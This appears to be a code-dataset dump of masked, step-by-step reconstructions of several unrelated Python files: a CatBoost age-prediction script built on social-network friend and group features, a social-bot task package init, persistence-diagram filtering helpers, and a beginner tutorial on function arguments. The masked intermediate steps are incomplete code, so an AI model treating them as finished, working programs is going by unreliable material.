test['median_friends_age'], test[\n 'mean_friends2_age'] = get_mean_and_median_friends(test.uid,\n uid2age, uid_friends)\n test['is_prob_age'] = test.prob_age != 0\n test['is_group_age'] = test.mean_group_age != 0\n test['is_friends_age'] = test.mean_friends_age != 0\n X_test = scaler.transform(test.drop(['uid'], axis=1))\n y_pred = model.predict(X_test)\n res = pd.DataFrame({'uid': test.uid, 'age': y_pred})\n res.to_csv('/var/log/result', header=True, index=False)\n\n\n<mask token>\n",
"step-4": "from typing import List\nimport pandas as pd\nimport numpy as np\nimport pickle\nfrom catboost import CatBoostRegressor\nfrom sklearn.preprocessing import MinMaxScaler\n\n\ndef calculate_probable_age(usersEducationFeatures):\n prob_age = {}\n grads_count = {}\n age_diff1 = 17\n age_diff2 = 22\n for index in usersEducationFeatures.index:\n count = 0\n skip = False\n if not pd.isnull(usersEducationFeatures.at[index, 'school_education']):\n prob_age[usersEducationFeatures.at[index, 'uid']\n ] = 2021 + age_diff1 - usersEducationFeatures.at[index,\n 'school_education']\n skip = True\n for i in range(1, 8):\n if skip:\n break\n if not pd.isnull(usersEducationFeatures.at[index,\n f'graduation_{i}']):\n prob_age[usersEducationFeatures.at[index, 'uid']\n ] = 2021 + age_diff2 - usersEducationFeatures.at[index,\n f'graduation_{i}']\n skip = True\n if not pd.isnull(usersEducationFeatures.at[index, 'school_education']):\n count += 1\n for i in range(1, 8):\n if not pd.isnull(usersEducationFeatures.at[index,\n f'graduation_{i}']):\n count += 1\n grads_count[usersEducationFeatures.at[index, 'uid']] = count\n return prob_age, grads_count\n\n\ndef get_prob_age(uids, prob_age) ->List[int]:\n res = [0] * len(uids)\n for i, uid in enumerate(uids):\n res[i] = prob_age.setdefault(uid, 0)\n return res\n\n\ndef get_grads_count(uids, grads_count) ->List[int]:\n res = [0] * len(uids)\n for i, uid in enumerate(uids):\n res[i] = grads_count.setdefault(uid, 0)\n return res\n\n\ndef get_groups_count(uids, usersGroups):\n tmp = usersGroups.groupby('uid').count()\n groups_count = [0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n groups_count[i] = tmp.at[uid, 'gid']\n except:\n continue\n return groups_count\n\n\ndef get_mean_and_median_group(uids, gid2age, uid_groups):\n mean_group = [0.0] * len(uids)\n median_group = [0.0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n tmp = [gid2age[x] for x in uid_groups[uid]]\n mean_group[i] = sum(tmp) / len(tmp)\n median_group[i] = 
np.median(tmp)\n except:\n continue\n return mean_group, median_group\n\n\ndef get_mean_and_median_friends(uids, uid2age, uid_friends):\n mean_friends = [0.0] * len(uids)\n median_friends = [0.0] * len(uids)\n mean_friends2 = [0.0] * len(uids)\n for i, uid in enumerate(uids):\n try:\n tmp = []\n if uid in uid_friends and len(uid_friends[uid]) < 42:\n for friend in uid_friends[uid]:\n if friend in uid_friends:\n for f2 in uid_friends[friend]:\n if f2 != uid and f2 in uid2age:\n tmp.append(uid2age[f2])\n mean_friends2[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0\n tmp = [uid2age[x] for x in uid_friends[uid] if x in uid2age]\n mean_friends[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0.0\n median_friends[i] = np.median(tmp) if len(tmp) != 0 else 0.0\n except:\n continue\n return mean_friends, median_friends, mean_friends2\n\n\ndef main():\n with open('gid2age.pkl', 'rb') as fin:\n gid2age = pickle.load(fin)\n with open('uid2age.pkl', 'rb') as fin:\n uid2age = pickle.load(fin)\n with open('uid_friends.pkl', 'rb') as fin:\n uid_friends = pickle.load(fin)\n with open('scaler.pkl', 'rb') as fin:\n scaler = pickle.load(fin)\n model = CatBoostRegressor()\n model.load_model('model')\n test = pd.read_csv('/tmp/data/test.csv')\n testEducationFeatures = pd.read_csv('/tmp/data/testEducationFeatures.csv')\n testGroups = pd.read_csv('/tmp/data/testGroups.csv')\n test['cfriends'] = 0\n for index in test.index:\n uid = test.at[index, 'uid']\n if uid in uid_friends:\n test.at[index, 'cfriends'] = len(uid_friends[uid])\n else:\n test.at[index, 'cfriends'] = 0\n prob_age, grads_count = calculate_probable_age(testEducationFeatures)\n test['prob_age'] = get_prob_age(test.uid, prob_age)\n test['grads_count'] = get_grads_count(test.uid, grads_count)\n test['groups_count'] = get_groups_count(test.uid, testGroups)\n uid_groups = {}\n for index in testGroups.index:\n uid = testGroups.at[index, 'uid']\n uid_groups[uid] = uid_groups.setdefault(uid, []) + [testGroups.at[\n index, 'gid']]\n 
test['mean_group_age'], test['median_group_age'\n ] = get_mean_and_median_group(test.uid, gid2age, uid_groups)\n test['mean_friends_age'], test['median_friends_age'], test[\n 'mean_friends2_age'] = get_mean_and_median_friends(test.uid,\n uid2age, uid_friends)\n test['is_prob_age'] = test.prob_age != 0\n test['is_group_age'] = test.mean_group_age != 0\n test['is_friends_age'] = test.mean_friends_age != 0\n X_test = scaler.transform(test.drop(['uid'], axis=1))\n y_pred = model.predict(X_test)\n res = pd.DataFrame({'uid': test.uid, 'age': y_pred})\n res.to_csv('/var/log/result', header=True, index=False)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from typing import List\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport pickle\r\nfrom catboost import CatBoostRegressor\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\n\r\ndef calculate_probable_age(usersEducationFeatures):\r\n prob_age = {}\r\n grads_count = {}\r\n age_diff1 = 17 # age difference for school\r\n age_diff2 = 22 # age difference for university\r\n for index in usersEducationFeatures.index:\r\n count = 0\r\n skip = False\r\n\r\n if not pd.isnull(usersEducationFeatures.at[index, \"school_education\"]):\r\n prob_age[usersEducationFeatures.at[index, \"uid\"]] = (\r\n 2021 + age_diff1 - usersEducationFeatures.at[index, \"school_education\"]\r\n )\r\n skip = True\r\n for i in range(1, 8):\r\n if skip:\r\n break\r\n if not pd.isnull(usersEducationFeatures.at[index, f\"graduation_{i}\"]):\r\n prob_age[usersEducationFeatures.at[index, \"uid\"]] = (\r\n 2021 + age_diff2 - usersEducationFeatures.at[index, f\"graduation_{i}\"]\r\n )\r\n skip = True\r\n\r\n if not pd.isnull(usersEducationFeatures.at[index, \"school_education\"]):\r\n count += 1\r\n for i in range(1, 8):\r\n if not pd.isnull(usersEducationFeatures.at[index, f\"graduation_{i}\"]):\r\n count += 1\r\n\r\n grads_count[usersEducationFeatures.at[index, \"uid\"]] = count\r\n return prob_age, grads_count\r\n\r\n\r\ndef get_prob_age(uids, prob_age) -> List[int]:\r\n res = [0] * len(uids)\r\n for i, uid in enumerate(uids):\r\n res[i] = prob_age.setdefault(uid, 0)\r\n return res\r\n\r\n\r\ndef get_grads_count(uids, grads_count) -> List[int]:\r\n res = [0] * len(uids)\r\n for i, uid in enumerate(uids):\r\n res[i] = grads_count.setdefault(uid, 0)\r\n return res\r\n\r\n\r\ndef get_groups_count(uids, usersGroups):\r\n tmp = usersGroups.groupby(\"uid\").count()\r\n groups_count = [0] * len(uids)\r\n for i, uid in enumerate(uids):\r\n try:\r\n groups_count[i] = tmp.at[uid, \"gid\"]\r\n except:\r\n continue\r\n return groups_count\r\n\r\n\r\ndef get_mean_and_median_group(uids, 
gid2age, uid_groups):\r\n mean_group = [0.0] * len(uids)\r\n median_group = [0.0] * len(uids)\r\n for i, uid in enumerate(uids):\r\n try:\r\n tmp = [gid2age[x] for x in uid_groups[uid]]\r\n mean_group[i] = sum(tmp) / len(tmp)\r\n median_group[i] = np.median(tmp)\r\n except:\r\n continue\r\n return mean_group, median_group\r\n\r\n\r\ndef get_mean_and_median_friends(uids, uid2age, uid_friends):\r\n mean_friends = [0.0] * len(uids)\r\n median_friends = [0.0] * len(uids)\r\n mean_friends2 = [0.0] * len(uids)\r\n for i, uid in enumerate(uids):\r\n try:\r\n tmp = []\r\n if uid in uid_friends and len(uid_friends[uid]) < 42:\r\n for friend in uid_friends[uid]:\r\n if friend in uid_friends:\r\n for f2 in uid_friends[friend]:\r\n if f2 != uid and f2 in uid2age:\r\n tmp.append(uid2age[f2])\r\n mean_friends2[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0\r\n tmp = [uid2age[x] for x in uid_friends[uid] if x in uid2age]\r\n mean_friends[i] = sum(tmp) / len(tmp) if len(tmp) != 0 else 0.0\r\n median_friends[i] = np.median(tmp) if len(tmp) != 0 else 0.0\r\n except:\r\n continue\r\n return mean_friends, median_friends, mean_friends2\r\n\r\n\r\ndef main():\r\n with open(\"gid2age.pkl\", \"rb\") as fin:\r\n gid2age = pickle.load(fin)\r\n with open(\"uid2age.pkl\", \"rb\") as fin:\r\n uid2age = pickle.load(fin)\r\n with open(\"uid_friends.pkl\", \"rb\") as fin:\r\n uid_friends = pickle.load(fin)\r\n with open(\"scaler.pkl\", \"rb\") as fin:\r\n scaler = pickle.load(fin)\r\n model = CatBoostRegressor()\r\n model.load_model(\"model\")\r\n\r\n test = pd.read_csv(\"/tmp/data/test.csv\")\r\n testEducationFeatures = pd.read_csv(\"/tmp/data/testEducationFeatures.csv\")\r\n testGroups = pd.read_csv(\"/tmp/data/testGroups.csv\")\r\n\r\n test[\"cfriends\"] = 0\r\n for index in test.index:\r\n uid = test.at[index, \"uid\"]\r\n if uid in uid_friends:\r\n test.at[index, \"cfriends\"] = len(uid_friends[uid])\r\n else:\r\n test.at[index, \"cfriends\"] = 0\r\n\r\n prob_age, grads_count = 
calculate_probable_age(testEducationFeatures)\r\n test[\"prob_age\"] = get_prob_age(test.uid, prob_age)\r\n test[\"grads_count\"] = get_grads_count(test.uid, grads_count)\r\n\r\n test[\"groups_count\"] = get_groups_count(test.uid, testGroups)\r\n\r\n uid_groups = {}\r\n for index in testGroups.index:\r\n uid = testGroups.at[index, \"uid\"]\r\n uid_groups[uid] = uid_groups.setdefault(uid, []) + [testGroups.at[index, \"gid\"]]\r\n\r\n test[\"mean_group_age\"], test[\"median_group_age\"] = get_mean_and_median_group(test.uid, gid2age, uid_groups)\r\n\r\n test[\"mean_friends_age\"], test[\"median_friends_age\"], test[\"mean_friends2_age\"] = get_mean_and_median_friends(\r\n test.uid, uid2age, uid_friends\r\n )\r\n\r\n test[\"is_prob_age\"] = test.prob_age != 0\r\n test[\"is_group_age\"] = test.mean_group_age != 0\r\n test[\"is_friends_age\"] = test.mean_friends_age != 0\r\n\r\n X_test = scaler.transform(test.drop([\"uid\"], axis=1))\r\n\r\n y_pred = model.predict(X_test)\r\n\r\n res = pd.DataFrame({\"uid\": test.uid, \"age\": y_pred})\r\n\r\n res.to_csv(\"/var/log/result\", header=True, index=False)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n",
"step-ids": [
5,
6,
7,
9,
10
]
}
|
[
5,
6,
7,
9,
10
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from .login import LoginTask
from .tag_search import TagSearchTask
from .timeline import TimelineTask
from .get_follower import GetFollowerTask
from .followback import FollowBackTask
from .unfollow import UnFollowTask
|
flexible
|
{
"blob_id": "e899b093152ee0923f1e5ad3b5719bbf9eb4339c",
"index": 7466,
"step-1": "<mask token>\n",
"step-2": "from .login import LoginTask\nfrom .tag_search import TagSearchTask\nfrom .timeline import TimelineTask\nfrom .get_follower import GetFollowerTask\nfrom .followback import FollowBackTask\nfrom .unfollow import UnFollowTask\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
# processing functions for diagrams
import torch
import numpy as np
def remove_filler(dgm, val=np.inf):
    """Return *dgm* with filler (padding) rows removed.

    Rows whose birth value (column 0) equals ``val`` are treated as
    padding and dropped; remaining rows keep their original order.
    """
    keep = dgm[:, 0] != val
    return dgm[keep, :]
def remove_zero_bars(dgm):
    """Return *dgm* without zero-length bars.

    A bar is zero-length when its birth (column 0) equals its death
    (column 1); such rows are dropped.
    """
    nonzero = dgm[:, 0] != dgm[:, 1]
    return dgm[nonzero, :]
def remove_infinite_bars(dgm, issub):
    """Return *dgm* without infinite bars.

    For a sublevel-set filtration (*issub* truthy) infinite bars die at
    ``+inf``; otherwise (superlevel-set) they die at ``-inf``.  Rows with
    that death value (column 1) are dropped.
    """
    endless = np.inf if issub else -np.inf
    finite = dgm[:, 1] != endless
    return dgm[finite, :]
|
normal
|
{
"blob_id": "ac459bff6d4281ce07b70dbccde3243412ddb414",
"index": 3155,
"step-1": "<mask token>\n\n\ndef remove_zero_bars(dgm):\n \"\"\"\n remove zero bars from diagram\n \"\"\"\n inds = dgm[:, 0] != dgm[:, 1]\n return dgm[inds, :]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef remove_filler(dgm, val=np.inf):\n \"\"\"\n remove filler rows from diagram\n \"\"\"\n inds = dgm[:, 0] != val\n return dgm[inds, :]\n\n\ndef remove_zero_bars(dgm):\n \"\"\"\n remove zero bars from diagram\n \"\"\"\n inds = dgm[:, 0] != dgm[:, 1]\n return dgm[inds, :]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef remove_filler(dgm, val=np.inf):\n \"\"\"\n remove filler rows from diagram\n \"\"\"\n inds = dgm[:, 0] != val\n return dgm[inds, :]\n\n\ndef remove_zero_bars(dgm):\n \"\"\"\n remove zero bars from diagram\n \"\"\"\n inds = dgm[:, 0] != dgm[:, 1]\n return dgm[inds, :]\n\n\ndef remove_infinite_bars(dgm, issub):\n \"\"\"\n remove infinite bars from diagram\n \"\"\"\n if issub:\n inds = dgm[:, 1] != np.inf\n return dgm[inds, :]\n else:\n inds = dgm[:, 1] != -np.inf\n return dgm[inds, :]\n",
"step-4": "import torch\nimport numpy as np\n\n\ndef remove_filler(dgm, val=np.inf):\n \"\"\"\n remove filler rows from diagram\n \"\"\"\n inds = dgm[:, 0] != val\n return dgm[inds, :]\n\n\ndef remove_zero_bars(dgm):\n \"\"\"\n remove zero bars from diagram\n \"\"\"\n inds = dgm[:, 0] != dgm[:, 1]\n return dgm[inds, :]\n\n\ndef remove_infinite_bars(dgm, issub):\n \"\"\"\n remove infinite bars from diagram\n \"\"\"\n if issub:\n inds = dgm[:, 1] != np.inf\n return dgm[inds, :]\n else:\n inds = dgm[:, 1] != -np.inf\n return dgm[inds, :]\n",
"step-5": "# processing functions for diagrams\r\n\r\nimport torch\r\nimport numpy as np\r\n\r\ndef remove_filler(dgm, val=np.inf):\r\n \"\"\"\r\n remove filler rows from diagram\r\n \"\"\"\r\n inds = (dgm[:,0] != val)\r\n return dgm[inds,:]\r\n\r\n\r\ndef remove_zero_bars(dgm):\r\n \"\"\"\r\n remove zero bars from diagram\r\n \"\"\"\r\n inds = dgm[:,0] != dgm[:,1]\r\n return dgm[inds,:]\r\n\r\n\r\ndef remove_infinite_bars(dgm, issub):\r\n \"\"\"\r\n remove infinite bars from diagram\r\n \"\"\"\r\n if issub:\r\n inds = dgm[:, 1] != np.inf\r\n return dgm[inds,:]\r\n else:\r\n inds = dgm[:, 1] != -np.inf\r\n return dgm[inds,:]\r\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
def move(x, y, step, angle=0):
nx = x + step * math.cos(angle)
ny = y - step * math.sin(angle)
return nx, ny
<|reserved_special_token_0|>
def enroll(name, gender, age=6, city='Beijing'):
print('name:', name)
print('gender', gender)
print('age', age)
print('city', city)
<|reserved_special_token_0|>
def add_end(l=None):
if l is None:
l = []
l.append('END')
return l
<|reserved_special_token_0|>
def calcTwo(*numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
<|reserved_special_token_0|>
def personThree(name, age, *args, city, job):
print(name, age, args, city, job)
def personFour(name, age, *, city='beijing', job):
print(name, age, city, job)
<|reserved_special_token_0|>
def personFive(name, age, city, job):
pass
def f1(a, b, c=0, *args, **kw):
print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)
def f2(a, b, c=0, *, d, **kw):
print('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def move(x, y, step, angle=0):
nx = x + step * math.cos(angle)
ny = y - step * math.sin(angle)
return nx, ny
<|reserved_special_token_0|>
def quadratic(a, b, c):
if not isinstance(a, (int, float)):
raise TypeError('a is not a number')
if not isinstance(b, (int, float)):
raise TypeError('a is not a number')
if not isinstance(c, (int, float)):
raise TypeError('a is not a number')
d = b * b - 4 * a * c
if a == 0:
if b == 0:
if c == 0:
return '方程根为全体实数'
else:
return '方程无根'
else:
x1 = -c / b
x2 = x1
return x1, x2
elif d < 0:
return '方程无根'
else:
x1 = (-b + math.sqrt(d)) / 2 / a
x2 = (-b - math.sqrt(d)) / 2 / a
return x1, x2
<|reserved_special_token_0|>
def power(x):
return x * x
<|reserved_special_token_0|>
def powerThree(x, n=2):
s = 1
while n > 0:
n = n - 1
s = s * x
return s
<|reserved_special_token_0|>
def enroll(name, gender, age=6, city='Beijing'):
print('name:', name)
print('gender', gender)
print('age', age)
print('city', city)
<|reserved_special_token_0|>
def add_end(l=None):
if l is None:
l = []
l.append('END')
return l
<|reserved_special_token_0|>
def calcTwo(*numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
<|reserved_special_token_0|>
def person(name, age, **kw):
print('name:', name, 'age:', age, 'other:', kw)
<|reserved_special_token_0|>
def person(name, age, **kw):
if 'city' in kw:
pass
if 'job' in kw:
pass
print('name:', name, 'age:', age, 'other:', kw)
<|reserved_special_token_0|>
def personThree(name, age, *args, city, job):
print(name, age, args, city, job)
def personFour(name, age, *, city='beijing', job):
print(name, age, city, job)
<|reserved_special_token_0|>
def personFive(name, age, city, job):
pass
def f1(a, b, c=0, *args, **kw):
print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)
def f2(a, b, c=0, *, d, **kw):
print('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def move(x, y, step, angle=0):
nx = x + step * math.cos(angle)
ny = y - step * math.sin(angle)
return nx, ny
<|reserved_special_token_0|>
def quadratic(a, b, c):
if not isinstance(a, (int, float)):
raise TypeError('a is not a number')
if not isinstance(b, (int, float)):
raise TypeError('a is not a number')
if not isinstance(c, (int, float)):
raise TypeError('a is not a number')
d = b * b - 4 * a * c
if a == 0:
if b == 0:
if c == 0:
return '方程根为全体实数'
else:
return '方程无根'
else:
x1 = -c / b
x2 = x1
return x1, x2
elif d < 0:
return '方程无根'
else:
x1 = (-b + math.sqrt(d)) / 2 / a
x2 = (-b - math.sqrt(d)) / 2 / a
return x1, x2
<|reserved_special_token_0|>
def power(x):
return x * x
<|reserved_special_token_0|>
def powerThree(x, n=2):
s = 1
while n > 0:
n = n - 1
s = s * x
return s
<|reserved_special_token_0|>
def enroll(name, gender, age=6, city='Beijing'):
print('name:', name)
print('gender', gender)
print('age', age)
print('city', city)
<|reserved_special_token_0|>
def add_end(l=None):
if l is None:
l = []
l.append('END')
return l
<|reserved_special_token_0|>
def calc(numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
<|reserved_special_token_0|>
def calcTwo(*numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
<|reserved_special_token_0|>
def person(name, age, **kw):
print('name:', name, 'age:', age, 'other:', kw)
<|reserved_special_token_0|>
def person(name, age, **kw):
if 'city' in kw:
pass
if 'job' in kw:
pass
print('name:', name, 'age:', age, 'other:', kw)
<|reserved_special_token_0|>
def personThree(name, age, *args, city, job):
print(name, age, args, city, job)
def personFour(name, age, *, city='beijing', job):
print(name, age, city, job)
<|reserved_special_token_0|>
def personFive(name, age, city, job):
pass
def f1(a, b, c=0, *args, **kw):
print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)
def f2(a, b, c=0, *, d, **kw):
print('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
print(abs(100))
print(abs(-20))
print(abs(12.34))
print(max(1, 2))
print(max(1, 2, 3, -5))
print(int('123'))
print(int(12.34))
print(float('12.34'))
print(str(1.23))
print(str(100))
print(bool(1))
print(bool(''))
a = abs
print(a(-1))
n1 = 255
n2 = 1000
print(hex(255))
print(hex(1000))
from abstest import my_abs
print(my_abs(-2))
<|reserved_special_token_0|>
import math
def move(x, y, step, angle=0):
nx = x + step * math.cos(angle)
ny = y - step * math.sin(angle)
return nx, ny
x, y = move(100, 100, 60, math.pi / 6)
print(x, y)
r = move(100, 100, 60, math.pi / 6)
print(r)
def quadratic(a, b, c):
if not isinstance(a, (int, float)):
raise TypeError('a is not a number')
if not isinstance(b, (int, float)):
raise TypeError('a is not a number')
if not isinstance(c, (int, float)):
raise TypeError('a is not a number')
d = b * b - 4 * a * c
if a == 0:
if b == 0:
if c == 0:
return '方程根为全体实数'
else:
return '方程无根'
else:
x1 = -c / b
x2 = x1
return x1, x2
elif d < 0:
return '方程无根'
else:
x1 = (-b + math.sqrt(d)) / 2 / a
x2 = (-b - math.sqrt(d)) / 2 / a
return x1, x2
print(quadratic(2, 3, 1))
print(quadratic(0, 0, 0))
def power(x):
return x * x
print(power(4))
print(power(-2))
def powerThree(x, n=2):
s = 1
while n > 0:
n = n - 1
s = s * x
return s
print(powerThree(5, 3))
print(powerThree(5))
def enroll(name, gender, age=6, city='Beijing'):
print('name:', name)
print('gender', gender)
print('age', age)
print('city', city)
print(enroll('Sarah', 'F'))
def add_end(l=None):
if l is None:
l = []
l.append('END')
return l
print(add_end([1, 2, 3]))
print(add_end())
print(add_end())
print(add_end())
def calc(numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
print(calc([1, 2, 3]))
print(calc((1, 2, 3)))
def calcTwo(*numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
print(calcTwo(1, 2))
print(calcTwo())
numbers = [1, 2, 3]
print(calcTwo(numbers[0], numbers[1], numbers[2]))
print(calcTwo(*numbers))
def person(name, age, **kw):
print('name:', name, 'age:', age, 'other:', kw)
person('michael', 30)
person('michael', 30, city='Beijing')
person('michael', 30, gender='m', job='engineer')
extra = {'city': 'Beijing', 'job': 'engineer'}
person('Jack', 24, city=extra['city'], job=extra['job'])
person('Jack', 24, **extra)
def person(name, age, **kw):
if 'city' in kw:
pass
if 'job' in kw:
pass
print('name:', name, 'age:', age, 'other:', kw)
person('jack', 24, city='beijing', addr='chaoyang', zipcode=123456)
def personTwo(name, age, *, city, job):
print(name, age, city, job)
personTwo('jack', 24, city='beijing', job='engineer')
def personThree(name, age, *args, city, job):
print(name, age, args, city, job)
def personFour(name, age, *, city='beijing', job):
print(name, age, city, job)
personFour('jack', 24, job='engineer')
def personFive(name, age, city, job):
pass
def f1(a, b, c=0, *args, **kw):
print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)
def f2(a, b, c=0, *, d, **kw):
print('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)
f1(1, 2)
f1(1, 2, 3)
f1(1, 2, 3, 'a', 'b')
f1(1, 2, 3, 'a', 'b', x=99)
f2(1, 2, d=99, ext=None)
args = 1, 2, 3, 4
kw = {'d': 99, 'x': '#'}
f1(*args, **kw)
args = 1, 2, 3
kw = {'d': 88, 'x': '#'}
f2(*args, **kw)
<|reserved_special_token_1|>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/4/11 16:07
# @Author : LiuZhi
# @Site :
# @File : Function.py
# @Software: PyCharm
#求绝对值的函数
print(abs(100))
print(abs(-20))
print(abs(12.34))
#print(abs(1,2))
#print(abs('q'))
print(max(1,2))
print(max(1,2,3,-5))
print(int('123'))
print(int(12.34))
print(float('12.34'))
print(str(1.23))
print(str(100))
print(bool(1))
print(bool(''))
a = abs
print(a(-1))
n1 = 255
n2 = 1000
print(hex(255))
print(hex(1000))
from abstest import my_abs
print(my_abs(-2))
#print(my_abs(-2,3))
#print(my_abs('222'))
'''
pass用法
def nop():
pass
age = 26
if age >= 18:
pass
'''
import math
def move(x, y, step, angle=0):
    """Move the point (x, y) a distance *step* in direction *angle*.

    *angle* is in radians measured from the positive x-axis; the y
    displacement is subtracted (screen-style coordinates).  Returns the
    new position as an (nx, ny) tuple.
    """
    dx = step * math.cos(angle)
    dy = step * math.sin(angle)
    return x + dx, y - dy
x, y = move(100, 100, 60, math.pi/6)
print(x,y)
r = move(100, 100, 60, math.pi/6)
print(r)
#求一元二次方程的根
def quadratic(a, b, c):
    """Solve the quadratic equation a*x^2 + b*x + c = 0 over the reals.

    Returns a tuple (x1, x2) of roots when they exist (x1 from the '+'
    branch of the quadratic formula), or a Chinese message string for
    the degenerate cases: '方程根为全体实数' when every real number is a
    solution (a == b == c == 0), '方程无根' when there is no real root.

    Raises:
        TypeError: if any coefficient is not an int or float.
    """
    # Validate each coefficient with an accurate message (the original
    # reported 'a is not a number' for all three arguments).
    if not isinstance(a, (int, float)):
        raise TypeError('a is not a number')
    if not isinstance(b, (int, float)):
        raise TypeError('b is not a number')
    if not isinstance(c, (int, float)):
        raise TypeError('c is not a number')
    if a == 0:
        # Degenerates to the linear equation b*x + c = 0.
        if b == 0:
            return '方程根为全体实数' if c == 0 else '方程无根'
        root = -c / b
        # Report the single root twice to keep the (x1, x2) return shape.
        return root, root
    d = b * b - 4 * a * c  # discriminant
    if d < 0:
        return '方程无根'
    sq = math.sqrt(d)
    return (-b + sq) / 2 / a, (-b - sq) / 2 / a
print(quadratic(2, 3, 1))
print(quadratic(0,0,0))
def power(x):
    """Return the square of *x*."""
    squared = x * x
    return squared
print(power(4))
print(power(-2))
#默认参数
def powerThree(x, n=2):
    """Return *x* raised to the power *n* (default 2, i.e. the square).

    Multiplies an accumulator by *x* once per remaining count, so *n*
    is expected to be a non-negative integer; n <= 0 yields 1.
    """
    result = 1
    while n > 0:
        result *= x
        n -= 1
    return result
print(powerThree(5,3))
print(powerThree(5))
def enroll(name, gender, age=6, city='Beijing'):
    """Print one enrollment record to stdout, one field per line.

    *age* defaults to 6 and *city* to 'Beijing'.  Returns None.
    """
    fields = (('name:', name), ('gender', gender), ('age', age), ('city', city))
    for label, value in fields:
        print(label, value)
print(enroll('Sarah', 'F'))
def add_end(l=None):
    """Append 'END' to *l* (in place) and return it.

    Uses the None-sentinel idiom: calling without an argument creates a
    fresh list each time, avoiding the shared-mutable-default pitfall.
    """
    result = [] if l is None else l
    result.append('END')
    return result
print(add_end([1, 2, 3]))
print(add_end())
print(add_end())
print(add_end())
#可变参数
def calc(numbers):
    """Return the sum of squares of the elements of *numbers* (any iterable)."""
    return sum(n * n for n in numbers)
print(calc([1, 2, 3]))
print(calc((1, 2, 3)))
def calcTwo(*numbers):
    """Return the sum of squares of all positional arguments (0 when none given)."""
    return sum(n * n for n in numbers)
print(calcTwo(1,2))
print(calcTwo())
numbers = [1, 2, 3]
print(calcTwo(numbers[0], numbers[1], numbers[2]))
print(calcTwo(*numbers))
#关键字参数
def person(name, age, **kw):
    """Print the required name/age fields plus any extra keywords (shown as a dict)."""
    print(f'name: {name} age: {age} other: {kw}')
person('michael', 30)
person('michael', 30, city='Beijing')
person('michael', 30, gender='m', job='engineer')
extra = {'city':'Beijing', 'job': 'engineer'}
person('Jack', 24, city = extra['city'], job = extra['job'])
person('Jack', 24, **extra)
def person(name, age, **kw):
if 'city' in kw:
pass
if 'job' in kw:
pass
print('name:', name, 'age:', age, 'other:', kw)
person('jack', 24, city='beijing', addr = 'chaoyang', zipcode=123456)
def personTwo(name, age, *, city, job):
print(name, age, city, job)
personTwo('jack', 24, city='beijing', job='engineer')
def personThree(name, age, *args, city, job):
print(name, age, args, city, job)
#personThree('jack', 24, 'beijing', 'engineer')
def personFour(name, age, *, city='beijing', job):
print(name, age, city, job)
personFour('jack', 24, job = 'engineer')
def personFive(name, age, city, job):
pass
def f1(a, b, c=0, *args, **kw):
print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)
def f2(a, b, c=0, *, d, **kw):
print('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)
f1(1, 2)
f1(1, 2, 3)
f1(1, 2, 3, 'a', 'b')
f1(1, 2, 3, 'a', 'b', x=99)
f2(1, 2, d=99, ext=None)
args = (1,2, 3, 4)
kw = {'d':99,'x':'#'}
f1(*args, **kw)
args = (1,2, 3)
kw = {'d':88, 'x':'#'}
f2(*args, **kw)
|
flexible
|
{
"blob_id": "8a6eb2eb746e3b9de92998b70ddff2a39cb1f269",
"index": 6374,
"step-1": "<mask token>\n\n\ndef move(x, y, step, angle=0):\n nx = x + step * math.cos(angle)\n ny = y - step * math.sin(angle)\n return nx, ny\n\n\n<mask token>\n\n\ndef enroll(name, gender, age=6, city='Beijing'):\n print('name:', name)\n print('gender', gender)\n print('age', age)\n print('city', city)\n\n\n<mask token>\n\n\ndef add_end(l=None):\n if l is None:\n l = []\n l.append('END')\n return l\n\n\n<mask token>\n\n\ndef calcTwo(*numbers):\n sum = 0\n for n in numbers:\n sum = sum + n * n\n return sum\n\n\n<mask token>\n\n\ndef personThree(name, age, *args, city, job):\n print(name, age, args, city, job)\n\n\ndef personFour(name, age, *, city='beijing', job):\n print(name, age, city, job)\n\n\n<mask token>\n\n\ndef personFive(name, age, city, job):\n pass\n\n\ndef f1(a, b, c=0, *args, **kw):\n print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)\n\n\ndef f2(a, b, c=0, *, d, **kw):\n print('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)\n\n\n<mask token>\n",
